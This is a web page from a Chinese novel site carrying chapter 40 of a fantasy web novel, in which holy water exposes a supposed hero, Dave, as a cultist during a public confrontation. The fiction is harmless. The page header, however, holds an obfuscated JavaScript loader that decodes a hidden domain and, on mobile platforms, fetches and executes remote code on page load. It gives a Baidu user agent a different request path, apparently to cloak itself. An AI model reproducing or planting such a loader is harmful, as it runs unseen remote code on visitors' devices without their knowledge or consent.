98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

第四十章:好戏(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

一直安静侍立于圣坛外围的某个小女神官忽然从袖口中拿出一个水囊,并且在所有人都还没有从刚刚的剧变中反应过来时飞快地小跑到了戴夫身边,拧开瓶塞用力一泼!

“呃……”猝不及防的戴夫顿时被淋湿了大片,而在他还没来得及反应过来的时候,一道金红色的火焰轰然爆散开来,这位刚刚还一脸坚毅的年轻人顿时发出了一声凄厉至极地吼声,一个踉跄便扑倒在地上!

“罗娜和拉达正在看着呢!”小艾轻轻拨开额前那几缕淡金色长发,露出了自己苍白中还带有着一丝潮红的面容,低头俯视着戴夫,轻声道:“你说,他们现在是否会感到一点点欣慰呢?”

赤金色的烈焰此时已经燃遍了戴夫全身,与此同时还有数道颜色各异的神光不断乍现着,尽管并没有给戴夫留下任何伤痕,但任谁也都能够听得出来此时正在嚎叫着的他情况很是不妙。

此时此刻,就算在迟钝的围观者也多少看出了情况不对,那正在升腾燃烧着的神秘力量,正在折磨着……他们的英雄……?

这股力量是如此的纯粹而澎湃,其中还隐隐带有着一缕怒意!

而圣教联合的圣职者们更是方寸大乱,他们对这种力量的认知更加清晰,无论怎么看,再次被泼了一身水的戴夫身上猝然爆发出地这股力量,都与他们认知中的神力别无二致!

到底发生了什么!?

“这……”莫夫主教已经彻底惊呆了,他看着此时正疯狂在地上翻滚地戴夫,难以置信的摇着头,喃喃道:“惩戒!为什么?为什么神眷者会受到神的惩戒!?”

当~~

忽然无比刺耳的钟声打断了所有人的思绪,下意识地抬头一看,那个刚才还满目苍白,恨不得将‘惊慌失措’四个大字写在脸上的白衣男子正十分惬意地靠在身后那口铁钟上,还将一只手掩在嘴边轻快地吹着口哨。

“哎呀哎呀!”墨檀似是才发现下面的众人再度将目光投向自己,颇为不好意思地揉了揉鼻子:“这到底是怎么一回事呢?”

【我们也想知道这到底是怎么一回事啊!!】

大家一惊一乍的都快被折腾疯了……

“不是早就说过好几次了吗~”墨檀耸了耸肩:“我还有话没说啊……当面对峙什么的不是还没开始吗?干嘛这么兴师动众的要抓人啊,害得戴夫同学……啧啧……这得有五分熟了吧?”

对峙个鬼啊!你要是真有心想对峙的话,刚才为什么让我们感觉你慌得一扌……啊!

“算了算了,那么现在就请我们在仓促中登场的、属于圣教联合的、侍奉于太阳神的、帕丁骑士学院二年级的、暖阳小队的~艾?凡耶同学,来为大家说两句吧。”墨檀嘴上这么说着,但戏谑的目光却一直盯着从刚才起就面色铁青的朗恩。

看了一眼正在自己面前拼命打滚,生命力异常顽强的戴夫,小艾转身面向所有人,轻声道:“我叫艾?凡耶,是之前戴夫同学口中的牺牲者之一,其实我原本的确应该死在城外,可惜那一晚戴夫同学并没有为我补上最后一剑,这让我活了下来!”

现场一片哗然……

也许这个稍显消瘦、面容清秀的女孩存在感并不强,但帕托城一共就这么大个地方,总有人能够将她认出来,于是在短短几秒钟内,人群中便已经被掀起了一阵轩然大波!

她没死,而且还说出来刚才那段带有着极大信息量的话!!

“所以从某种角度而言。”小艾看向戴夫的目光十分柔和:“他也许的确算是我的恩人吧,只可惜我现在还无法瞑目就是了。”

“凡耶同学!”在一片死寂中,朗恩终于开始有所行动,将‘慈祥’地目光投向身旁的小神官:“真高兴看到你活了下来,但对于你的精神状态我却有些担心,毕竟……”

他抬头看了一眼正抱着胳膊低头好像在看戏一般的墨檀,沉声道:“你有可能受到了蛊惑,一些心怀恶毒的人从不会吝于操控我们这些单纯而善良的人。”

言下之意昭然若揭……

钟楼上那货一看就知道不是什么好东西,我们怎么知道你会不会被他用某种不为人知的手段给操控了呢。

“我很清楚我在说什么。”小艾摇头道:“也同样愿意为我的每一句话负责。”

“但你刚才却听从了那个亵神者的话!”朗恩指向戴夫,厉色喝道:“袭击了一个神眷者!一个受神眷顾之人!”

诡异的情况发生了,在朗恩这声大喝之后,戴夫痛呼的声音忽然就低了下去,身上那赤金色的火焰也瞬间变得柔和了几分,似是在犹豫与困惑着什么……

“对……”戴夫的意识立刻恢复了一丝清明,沙哑着嘶吼道:“我是神眷者,我是受眷顾之人,我是如此的虔诚……神不会伤害我的……”

尽管他的话语中充满恍惚,内容在旁人听来也多少有些奇怪,但那莫夫主教口中的惩戒似乎一下子就黯淡了下来。

“大家看看!”朗恩忽然抬高了声音:“神的信徒是不会被轻易击垮的,哪怕是在如此精心且恶毒的暗算之中!”

民众再次开始犹豫了……

虽然他们心中已经产生了疑惑,但无论怎么看戴夫也比那个似乎在一直戏弄着众人的疯子要值得信任。

“冲他洒了一些诸神之水,可以称之为恶毒的暗算么?”小艾困惑地看着朗恩:“只有亵神者与邪教徒才会被伤害啊。”

朗恩见场面已经再次近乎于稳定,立刻显得从容了不少,慈眉善目地摇头道:“谁知道你刚才泼出的是什么呢?而且如果说起亵渎者与邪教徒的话,我想钟楼上那个家伙似乎更像吧?凡耶同学,请原谅我们无法信任你。”

这个‘们’用的相当有学问,一下子就将自己的立场与大众捆绑在了一起,果然,朗恩的话音刚落便在人群中引起了不少的共鸣。

而且戴夫身上的惩戒神光此时已经近乎于熄灭了……

“我要怎么做才能证明?”小艾冷静地看着朗恩,很那想象在不久之前她还是一个性格腼腆而内向的小女孩。

“恐怕你现在无法证明。”朗恩摇头道:“除非你与那位亵神者立刻接受卫兵的看管,不要再继续引发骚动,之后的事就不是我这么一个没用的老家伙能够负责的了。”

小艾沉默了,而钟楼上的墨檀则轻轻挑了挑眉,刚要说话……

“我想我可以替她证明。”却不料一个分贝不低的嘀咕声从圣坛下响起,众人定睛一看,好么,这不是那个有着猛犸血统的半兽人小神官嘛!

“你在胡说些什么!”朗恩感觉这个人都不好了,谁能告诉他这个看着跟个狂战士似的‘小’姑娘在搞什么幺蛾子!

“那个……”猛犸小神官不好意思地低着头:“她盛水的时候,我就在一旁,所以那应该并不是假的。”

朗恩立刻反驳道:“那你怎么知道她之后没有掉包过呢!?”

“啧啧,掉包~”墨檀忽然轻声笑了笑:“说的好。”

“呃……”结果猛犸小神官却是真的被问住了,站在原地愣了半响,直到朗恩开始禁不住微笑起来才猛地一拍手:“我这里有真的啊!”

蛤!?

在众人愕然的目光中,她从脚边提起了一个硕大的桶,冲身边的几个小修女笑呵呵地说道:“我当时也给自己接了一大杯,好多人都看见了,而且我一直都是跟大家一起行动的,对吧?”

卧槽,好大一‘杯’!

且不说旁人,就连墨檀都有些惊了……

几个平时与小猛犸关系数落的圣职者木然地点了点头,证明了她却是没有撒谎。

“那我试试啊!”这姑娘爱现,性格也挺耿直,二话不说就拎着桶……我是说杯,拔腿走向戴夫。

朗恩眼睛都红了,连忙惊呼道:“等……”

哗啦!!!!

“啊啊啊啊啊!!!”好不容易用某种神秘力量压下了惩戒之力的戴夫被淋了个饱,顿时就撑不住了,整个人当场原地爆燃了起来,仿佛一团移动的人形圣火,跑了两步就啪叽一下砸在了地上,同时还有一缕缕惨白色的雾气从他体内升腾而起。

“哇啊!”小猛犸顿时原地一个后跳:“着了着了!等等……这是什么气息!”

“邪神之力!”莫夫主教立刻后退了好几步,阴沉地看着戴夫:“他是邪教徒!”

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间